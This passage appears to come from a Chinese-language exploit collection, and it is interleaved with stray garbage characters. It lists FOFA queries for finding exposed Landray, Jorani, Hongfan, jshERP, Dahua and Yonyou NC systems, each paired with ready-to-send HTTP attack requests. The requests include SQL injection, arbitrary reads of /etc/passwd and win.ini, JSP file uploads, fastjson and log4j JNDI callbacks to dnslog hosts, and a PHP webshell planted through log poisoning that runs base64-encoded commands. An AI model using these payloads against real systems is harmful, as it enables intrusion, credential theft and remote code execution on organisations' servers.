FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"* j) n# Q4 g: R7 N& c {
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
) g/ I! F" ~8 J; HHost: 127.0.0.1 \. b$ n1 f) Q9 C# Z2 x
Pragma: no-cache" _3 t2 i5 G6 u2 D b: P2 [
Cache-Control: no-cache
( c/ i# L2 H. ^Upgrade-Insecure-Requests: 17 t( E- U' f" @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.369 E' y u9 j) C
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
; ?+ x" `4 _: W9 @* }* eAccept-Encoding: gzip, deflate/ L% V, z9 Z( R0 ^2 f* a& g- F
Accept-Language: zh-CN,zh;q=0.9,en;q=0.84 r7 L% Z8 @9 g* F4 p/ E5 U
Connection: close
S; V$ `0 Q3 n# O/ x3 @" S% q0 t- h0 r' K
: E" l5 ?$ e3 P( V$ c
12. Jorani < 1.0.2 远程命令执行
& p. c# R( `' R2 }# ~1 e W) XFOFA:title="Jorani"9 u6 l& s0 i/ a5 r9 |$ ]
第一步先拿到cookie
' l+ [1 \' {( n) F% rGET /session/login HTTP/1.1
/ b+ }3 b0 D6 B# bHost: 192.168.190.30
5 `, g- _0 q, m' X% i3 Z; IUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
3 X7 }5 @5 o. r; yConnection: close
9 |+ Y* ?% Z0 }* tAccept-Encoding: gzip, ^& p6 Q& w3 ]8 J3 k4 P2 W. R
7 ?% e3 Z) z+ v q- \% D* C
& v: {- b, w N) z9 M6 T响应中csrf_cookie_jorani用于后续请求
) B: i4 L8 [* |* R9 IHTTP/1.1 200 OK) O; S7 e0 r9 d" u% _. i
Connection: close! c3 y: _; m+ N5 f
Cache-Control: no-store, no-cache, must-revalidate
% M5 r9 _6 A) E0 R0 z, EContent-Type: text/html; charset=UTF-87 h& r: t( ]8 Z$ m7 V; Y q
Date: Tue, 24 Oct 2023 09:34:28 GMT
! ^0 Q- a/ P+ S7 iExpires: Thu, 19 Nov 1981 08:52:00 GMT- O* R \8 ?4 o* g
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT$ v" `5 o; Q9 ]0 x+ F& |- d7 O
Pragma: no-cache9 h* L ?; `/ _6 ]
Server: Apache/2.4.54 (Debian)
9 W6 ?: B( M K' h# P3 ySet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
, x; q! M9 W. N+ fSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
. i1 Z9 J) y' h1 G! i$ WVary: Accept-Encoding
( L8 V" x2 g3 T/ h1 O
" W* K+ R/ p' F' K& F
( m. e0 w3 t: Y2 t jPOST请求,执行函数并进行base64编码3 L/ Y( H4 K$ C' b8 W" ^9 V5 ?" T# j
POST /session/login HTTP/1.1- j7 x- u+ Y; v( p, @8 E/ e! K
Host: 192.168.190.30
+ a4 g$ l. B9 U1 V2 w* mUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
4 M" N4 L# T- W# t3 ^Connection: close
# o4 }* j' F& e" S: C0 VContent-Length: 252
$ n3 H% Q3 U: K* G( B5 V0 pContent-Type: application/x-www-form-urlencoded
7 }& N: q$ W% _Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r5 x' z5 A& o& R
Accept-Encoding: gzip
- F$ a$ K1 B2 k! l' H5 u2 Q
: N7 H' @" N8 Y; `2 n6 p# k9 ucsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor% v7 i' a4 B" Y0 L0 j. S
2 S7 m5 i1 M" H, c. U
4 i$ l- Z* `' P r* p( I3 E
2 N+ }2 M! l1 ^6 I8 V& g向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串% Y7 p+ J8 t9 ]1 z7 G
GET /pages/view/log-2023-10-24 HTTP/1.1* n/ Q' c( b; v! J) P0 }
Host: 192.168.190.30
# l; U; @+ O# @. x: b% d+ UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
5 r& p$ e; L3 D9 A, D$ h' jConnection: close
. L, q' ~9 w+ A: F D1 N2 T: O QCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
; @' y7 g6 v& X# a; Q4 e* P: ]K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
6 [: O6 p' F; [5 n! ~ P: aX-REQUESTED-WITH: XMLHttpRequest
* Y. ?8 j6 u5 X' o, x* m; |& JAccept-Encoding: gzip
! X- ~' G, ~# E( P0 i4 |% {* c* }: {* a u4 ]* m/ H$ w' i) S
8 e9 Z" Q6 n6 N2 ?; ]" ?# Y& d- T
13. 红帆iOffice ioFileDown任意文件读取
& G* b! L/ x2 i' PFOFA:app="红帆-ioffice"
1 ?4 H# s7 d( S- D- lGET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
+ C9 b& I: Q( ^Host: x.x.x.x
- ~, `; e) _+ F- T6 u! pUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
9 C% H- v: S$ l: u: JConnection: close2 `% R$ x8 E1 S( L) H& Z: f7 D' y
Accept: */*6 i5 v: w8 v6 g! D' y
Accept-Encoding: gzip8 J! T6 G. }: h' y/ s; K
) |1 Z* i# ?! o4 G
0 P, h. O$ Y) G; R! h14. 华夏ERP(jshERP)敏感信息泄露
u4 x/ D: w' c) F, w; _FOFA:body="jshERP-boot"- u6 Z; m- S/ m$ k: ^1 T/ a0 x. s
泄露内容包括用户名密码3 E( f- b: i+ o1 {$ I
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
3 {5 s- _9 r; oHost: x.x.x.x
' K/ j8 ]$ e! U) \# h$ B2 aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36: N7 U; u. G8 K4 Z9 h) `
Connection: close* c/ d# B3 [9 u9 V
Accept: */*& z8 o" `: Z7 Z7 z6 y
Accept-Language: en; h% f. R: s1 K: k- R
Accept-Encoding: gzip
0 L$ E: R1 a, f2 y/ H* r; Q2 k) c) O# k' h! |6 \$ ^6 ^
3 O( A2 e: z5 B+ q( Z6 B) f
15. 华夏ERP getAllList信息泄露
( d! O r/ u! F. C: C/ QCVE-2024-0490
3 Q% h4 H5 l8 O3 hFOFA:body="jshERP-boot"
- H+ O* f& N! G' T5 C泄露内容包括用户名密码
) e! z5 u, }$ F D, V% JGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
3 N' E4 V$ {2 V: q6 GHost: 192.168.40.130:100
/ P0 {: i- y( P2 ]. s7 P4 r% BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
\1 L* D- H$ G: h1 q0 |% OConnection: close
& |8 b8 q! p2 r u' [1 a) h9 aAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
+ X) P1 N/ s C: E8 K' j4 a- YAccept-Language: en
3 h) s% f3 D& @+ U) jsec-ch-ua-platform: Windows; D$ Y5 ^( V( l6 u4 r+ {4 N
Accept-Encoding: gzip1 L H6 o* Z+ g7 Y2 B/ }/ @
7 A+ n) ]9 U6 V( c1 A8 o4 P5 ? ]+ g. B" q* {* ] b L5 ]; y& S
16. 红帆HFOffice医微云SQL注入
0 m$ p5 {( B, d( k& N+ EFOFA:title="HFOffice"
$ x" C7 e% t1 `9 \! \7 `( B2 J* H( lpoc中调用函数计算1234的md5值
/ y8 K% {0 w1 w* p2 yGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.13 l8 ^ T) A" v: h$ B& @1 N
Host: x.x.x.x3 o/ v3 a7 C, T6 ^" r5 k
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36# P' p. f; |3 ^# G' t: V2 J' T2 b
Connection: close9 e( {3 Y ^. x5 j& a
Accept: */*4 v: ~/ K& E) W* Q
Accept-Language: en, m5 v; h6 z1 L, u- [
Accept-Encoding: gzip9 \# h; T* q, c
" E, q' ]( G* D5 } Y
. Q9 Y# I, H) D8 D" c
17. 大华 DSS itcBulletin SQL 注入- e( i# v d' c4 Y
FOFA:app="dahua-DSS"
' M4 u2 S4 W) A! ^POST /portal/services/itcBulletin?wsdl HTTP/1.1: }; h1 f! o/ @$ f! K
Host: x.x.x.x' }* M# O/ Q9 N4 B, S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15+ I5 G9 E) M; z% S9 n0 I
Connection: close4 q2 B7 [$ S2 Z: d6 v6 N
Content-Length: 345* A8 L: K$ D/ S. t) A" S
Accept-Encoding: gzip
$ T; C0 B- z0 R9 Z6 m( a: S Q: ?, p
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
3 T, O2 _) `. a- z+ O. a<s11:Body>
; q. Q9 O7 Q% ~2 a; Y- k <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'> h+ w9 |0 s+ I) o
<netMarkings>2 |1 C6 c* X. ]
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
) {( t" K/ v6 ?5 k </netMarkings>
" C* W, B1 d3 m$ c0 | </ns1:deleteBulletin>" V- @: V8 t+ s& G1 k
</s11:Body>
3 u( ^, T; r) f1 n/ a- |' W</s11:Envelope>3 q0 A9 y# ^6 i9 ?
6 M( v1 j) l9 Y% d7 ~# h. E: f$ D" P. H
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露4 Z6 E2 _0 j, {/ U& n
FOFA:app="dahua-DSS"* g; ~2 K( s9 d2 ]7 f* ]8 ^
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
/ r7 Q0 l5 {' O% {% U7 D$ gHost: your-ip/ s# L& `" W, w* N+ V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 A, n# j. x5 C2 XAccept-Encoding: gzip, deflate+ D! Z& {# w& P+ d" U5 B
Accept: */*
: E$ {5 F" v$ b3 L HConnection: keep-alive
' J6 m2 B) M( m! A2 G* w2 Z2 M; R1 j- e3 D# Y; I
: P0 e8 X5 T( {" @
; p1 q* C! k: O& d `5 t0 }19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
2 m+ n- m6 i$ n# ]% r# S9 P/ qFOFA:app="dahua-DSS"
. c( t- V3 N0 M9 ^, B6 k+ DGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
( V/ B8 \2 I% t6 X1 B# eHost:
- S* }) L6 R; n! E+ V% l) LUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
. {" @% L4 M. i2 `! `8 P, xAccept-Encoding: gzip, deflate
* n7 R. o8 l* h3 bAccept: */*
: D* ]9 t7 o/ k) RConnection: keep-alive
! ]; ^' r. [/ g3 a T% \+ B' X. Y2 ^- |" g% e) ~* L! {
+ }0 Z. v; ]- f. m20. 大华ICC智能物联综合管理平台任意文件读取, \; d% R1 I* S- A# ]0 q0 C
FOFA:body="*客户端会小于800*"
# @ P' I w8 K! IGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
3 c0 x+ s: y# A. m @! m* iHost: x.x.x.x
* k# H0 F6 e- X% z1 J: l7 k- _User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36! z# x o2 q# h& g, x& z
Connection: close
# ~+ c& Z0 J5 \% ~! X; |Accept: */*
& h- r1 T% J- ~4 BAccept-Language: en
* ]2 F0 b6 G4 r! J6 ^0 ZAccept-Encoding: gzip
) F# Z, H; l2 H8 C% Y3 j9 q+ C" J& G
2 F% w2 f7 ^* S1 N9 i+ V" k21. 大华ICC智能物联综合管理平台random远程代码执行
3 N; z! _% I( [( s7 y2 r5 LFOFA:icon_hash="-1935899595"
4 }! q1 c$ e, H( C) jPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
* ^; p$ ]5 ]4 t7 }( q0 |/ \Host: x.x.x.x' A+ Y$ a" f6 a" m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ j+ H% g. H% x5 _" N
Content-Length: 1618 Z" l4 f1 I2 [; h& Y3 M
Accept-Encoding: gzip
: J5 T7 W! m# M N V' {Connection: close
`, P0 e; _( t4 z+ u! i/ FContent-Type: application/json;charset=utf-8
; G' `5 I. T* a; G ^- Z8 P C' n( g+ |: v$ W& k
{: `6 e: D& z" B9 T3 A
"a":{
9 g1 I5 Z: M/ ~ ` "@type":"com.alibaba.fastjson.JSONObject",
5 g7 R6 E8 N2 X$ W# l) |$ B7 [6 B {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}; F1 S, n7 c$ M, v' W4 J* S
}""( P7 j2 S$ ?( J K4 P
}
6 [' v* r) U. C! ]& Z4 R% [, R1 Z7 L! }4 F6 j1 g A! D: Y4 z) Y
! D$ _; s7 i! v& ~: @" f- W
22. 大华ICC智能物联综合管理平台 log4j远程代码执行$ {4 b0 H1 V; `. A
FOFA:icon_hash="-1935899595"
]6 x# v1 X8 GPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1) ?) |9 Z* i) d) O7 V
Host: your-ip
9 K7 U: h4 r. L' v3 s/ F0 z sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.365 E/ {& V; v, ]) o0 w2 ?0 U7 t
Content-Type: application/json;charset=utf-82 w J" O, L+ E. @; L7 c
- @1 Z8 ^$ S6 C. ?* B: B{
7 B1 T0 H0 R: ?, P"loginName":"${jndi:ldap://dnslog}"8 [1 W6 g/ U) e
}) b) V9 H- M0 e! |0 R7 X; p5 x' A/ H
! l( l% q! W5 S- y+ u" Q1 h% d9 S. m1 c b1 d+ C: x
- g+ r1 @; p M& ~5 j6 \- }5 r" a, Z* M
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行" U- o a0 I* [4 k: J/ p1 C2 h
FOFA:icon_hash="-1935899595"7 H1 Y. q) j3 M( ^9 G
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
5 p5 Z! J9 m1 q; q& t) Z0 qHost: your-ip) O) D# f$ I& I" P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
; M7 Y3 j. s2 BContent-Type: application/json;charset=utf-8# R: A, m9 w+ }4 {
Accept-Encoding: gzip9 f) N; u4 p) H
Connection: close: G+ o7 O B+ w1 d2 S6 u
* A# Y' I$ x6 ^" U5 `$ A4 Y{
* N8 \2 ]3 [7 k. M "a":{! c8 I7 |& G% ^( r; x: u2 t
"@type":"com.alibaba.fastjson.JSONObject",6 `8 L6 }- r- F w- Z& Y2 g
{"@type":"java.net.URL","val":"http://DNSLOG"}
( O0 M1 o/ A( L% L* C# ]0 R; E }""2 a# G2 r* e" e5 J- f3 x
}0 @4 @2 Y0 Q7 E3 N: h9 }; s! n) u9 @
U% e5 Q' X. R, ]3 i! C8 M1 g4 L0 E
4 H6 L; f% g* x1 m0 T3 @, n24. 用友NC 6.5 accept.jsp任意文件上传
# l# o6 w/ C2 R' qFOFA:icon_hash="1085941792"' y5 y5 K( u) P V& B. y% T
POST /aim/equipmap/accept.jsp HTTP/1.1( G1 ~$ \% \2 K; ]# l( H5 ~
Host: x.x.x.x1 ], \) V" Z; Q0 F
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
; P ^ z4 b- k/ g/ x$ R" ZConnection: close+ G: `4 Y3 |) Y. k% C
Content-Length: 449
& G* H/ q6 F+ n3 zAccept: */*
4 b9 x3 Z/ G- Q. k9 |+ dAccept-Encoding: gzip) i% c* K8 F% C3 n0 F8 F( L& y
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
- d1 D% q `% |/ P2 f M
2 j' J* g% a! I5 s+ t" `% v-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
; x1 B0 |+ Y7 z) J( O* qContent-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"$ d( d; b8 k' J2 E3 i8 n, I M) e
Content-Type: text/plain
3 t8 e _$ r( s8 u$ |2 d1 r8 M- f# w2 @; V1 F& O. |2 x2 [
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
- Y8 y/ G y* y- p+ V, c6 q$ X/ v-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc0 P5 M3 [& ]1 B0 i0 a$ P5 [3 a
Content-Disposition: form-data; name="fname"
6 T# l% a9 F3 ^: F! D4 u% i3 r& a+ l+ Y3 M/ g
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp7 M) r2 W4 c; n0 b# m" T. T, f z3 D
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
( n' I) i; s" p0 R9 o. x/ w4 h5 S( l% d' p
?# |4 T! k: n: X25. 用友NC registerServlet JNDI 远程代码执行* s1 I/ u: C, A- G; k& ~0 \
FOFA:app="用友-UFIDA-NC", k1 Y: k! v0 W) ?& x @" D
POST /portal/registerServlet HTTP/1.1
7 b9 n( ]4 z& H/ {# D3 UHost: your-ip# k& g: I4 T6 j& N% N; O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.07 P3 T/ k" [. b1 c6 k2 x' \1 m; s. G, g, w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
& `) f4 r- w" _- WAccept-Encoding: gzip, deflate
6 M3 K. _# H: M/ M0 o; zAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
1 X% ~( ~$ Y# w& t7 U' hContent-Type: application/x-www-form-urlencoded
2 Z/ F! F f# _% [; r$ c, W" ?; Z) G7 o
type=1&dsname=ldap://dnslog
( q% j( K8 l- @! ~( |3 Z" d/ d0 [( p2 I7 v' m% W
7 K3 I, b$ e9 h
?/ \' u* M& ]6 y
26. 用友NC linkVoucher SQL注入
/ u0 s0 C% z1 g6 E6 n; K* Y& `FOFA:app="用友-UFIDA-NC"
# w' h8 t, w" a% e4 z# L6 VGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.18 L2 z. {% m$ t$ ^ z& b; O% W6 T
Host: your-ip
7 N4 _# P- v7 wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36* I- D9 M6 n+ Y3 `9 ~% R e
Content-Type: application/x-www-form-urlencoded
3 N) w9 E$ ]" o# L$ R, n O5 cAccept-Encoding: gzip, deflate8 j2 M3 `$ b, d8 y' M9 i* P
Accept: */*
4 Q% C' |9 x7 h/ c( m' u, }Connection: keep-alive
5 K! k9 w2 c) F' q- s: @& ~* |5 G4 D9 ~$ v, f! O8 j K
$ X. q A/ a4 S. C5 P3 U; t3 L27. 用友 NC showcontent SQL注入2 f1 g" N9 g) _6 H. I
FOFA:icon_hash="1085941792"& V% u5 U6 T, P. X
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
4 B4 a! W4 a. v; b, cHost: your-ip
8 K: W& z5 r4 G5 i+ ^8 jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
( o# X5 y7 c5 C7 T2 X; GAccept-Encoding: identity) `( t7 H5 |9 Y$ u
Connection: close
) Y) E% r" \% ~7 B" ` i; z* gContent-Type: text/xml; charset=utf-8
/ O* a6 y. i( P+ R9 D0 y9 }: z* p8 D1 }: [& `
+ |. z3 v& L7 k/ I i28. 用友NC grouptemplet 任意文件上传9 Z3 H0 A. b. I1 M0 r
FOFA:icon_hash="1085941792"/ r0 s* W& ]; z8 d/ Z
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
; Q& a8 Z( _# ~0 F* fHost: x.x.x.x
) x& @0 I: w8 a* R) B0 g4 }& TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
# A- o) _! t- ~2 E. IConnection: close
4 H- N" w& w( n* G7 B, w: f* eContent-Length: 268
6 c, P4 `1 c: _ W7 AContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
& S' v/ |! E8 A* hAccept-Encoding: gzip4 O6 j0 S& r( m1 A
. w6 H+ D2 Y6 V7 |* }! ]: X
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk; ~, z2 N# y. ]- u$ l, v+ T1 X
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"3 E8 z4 V, }1 T& `# G' Z* m1 M
Content-Type: application/octet-stream d2 f' x1 v1 o) v1 _* h0 ^+ _1 s
- a4 ?+ u h& z1 t5 ~
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
2 @) M1 ~4 J- r2 M% ?/ ^; y------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
5 n- o1 G, Y' B7 S( _" ~( i2 o% r! X0 l: z, L
+ a7 s! u& u8 D; Z4 Q/ P. {( A' G
/uapim/static/pages/nc/head.jsp# k. t1 `7 h" H5 J( }; v
5 ^- x( g, t1 n5 Y$ r
29. 用友NC down/bill SQL注入7 w: q% w" V, _0 P& }9 M9 v$ E% ]$ @
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
) o0 }4 s* _; y, D$ C) BGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
5 r: C/ O( O0 u# `Host: your-ip2 T+ {( p! Z7 v8 {9 d: |7 v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36! ~' Z: R7 `1 ~ h! N8 v
Content-Type: application/x-www-form-urlencoded
6 l5 v, m' w% C( ?0 [/ x8 Q' |" EAccept-Encoding: gzip, deflate: y- v- N- z( w
Accept: */*
+ G' j! c! ~7 s: yConnection: keep-alive
o% G: Y% |4 c, {2 ^( R
8 `& B# r6 }, l7 X$ {6 `, \( C- F u
30. 用友NC importPml SQL注入
: d% |" C4 y! ~! v9 m3 qFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
' Z4 O( T5 X0 _9 D) GPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1* V6 A# } k- r* L
Host: your-ip
. z8 y( D! }9 K7 f# ~! e, h# V8 i, vContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V# R- v( N Z- |8 o, j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
5 a- [3 a3 t- R7 [! w/ [Connection: close7 k' g; V7 q/ l+ q' x f6 ^
/ n: K, w5 u" U( \; M8 T
------WebKitFormBoundaryH970hbttBhoCyj9V. Q: t. k1 V$ l1 `, J( b+ v
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
% u. a" ?9 s2 X A& P$ ]4 S- m4 oContent-Type: image/jpeg
' f8 m+ _. W; B4 a+ N------WebKitFormBoundaryH970hbttBhoCyj9V--
& u |' s1 y: u5 O+ b) F
# L8 }: X) Q" q8 P" Z
" f+ i4 W. _% J( e" u31. 用友NC runStateServlet SQL注入; Z& s( Z5 k9 U/ L
version<=6.5, V$ f7 v. m; a4 T/ s& ~% u& Q
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"% |# N' K; R, h( N2 \
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
/ @ V3 v. H# Q8 E2 XHost: host
0 i1 F9 @! o8 \7 a9 YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36( w- E6 U$ o6 w: Z3 {2 G7 u! f& e$ v
Content-Type: application/x-www-form-urlencoded0 X8 l8 G8 {/ e9 g0 v' `& \: j
; I- v9 ^ O X/ @- |
5 u4 B+ y+ m' B5 t# d32. 用友NC complainbilldetail SQL注入
5 _4 ~, `7 A# H% e2 Gversion= NC633、NC65
2 R T. a: I- y+ L" ]: k2 uFOFA:app="用友-UFIDA-NC"
0 ^; j- z- W, ]3 l& D# s5 T2 vGET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
+ e8 s# \$ E0 A+ Z5 m+ k2 THost: your-ip6 }# u& E3 x$ i0 s. X) n, e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
3 N# K+ `) E9 g+ K# eContent-Type: application/x-www-form-urlencoded8 v6 d# H J& h) X
Accept-Encoding: gzip, deflate
+ f4 }/ S s4 ^; ?1 OAccept: */*- H6 n' ^1 D7 u
Connection: keep-alive' g( j0 r( K- j9 c
& g% K! p# h, L7 o
( |( R5 u% a0 \$ A33. 用友NC downTax/download SQL注入
9 g. \3 h% m! R. I% xversion:NC6.5FOFA:app="用友-UFIDA-NC"/ v! N8 e, O( n* K8 E5 q0 ^
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
6 a! o( i& K4 d- a* S& R W$ sHost: your-ip
$ @3 }- N8 U/ M2 s! ?0 w( B* FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 {0 O E6 Y1 I% HContent-Type: application/x-www-form-urlencoded, J# u) c0 |- r# {8 `
Accept-Encoding: gzip, deflate
7 V; G& d( T. B- X& n0 I. mAccept: */*
$ b- E) ^( ~1 ?1 r3 Z2 wConnection: keep-alive& r) r5 c7 B( c! `0 ~9 Q* o
& U. Q. ~% H. X" P. I* K2 G* l9 b! v$ d% T( g9 w5 u! f8 t
34. 用友NC warningDetailInfo接口SQL注入
( [) O- v0 p T1 [- [FOFA:app="用友-UFIDA-NC"5 |( }2 B1 ^0 t, e" p; i
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.18 [5 \8 I, c* x# D/ |( j
Host: your-ip
0 a+ c: w( @$ R, I9 \& o- ~/ qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
& X: v( x* Y$ M7 r1 }. C, s) dContent-Type: application/x-www-form-urlencoded
& r4 R1 \# c |( x! I' FAccept-Encoding: gzip, deflate1 c/ K$ \) i1 C& w
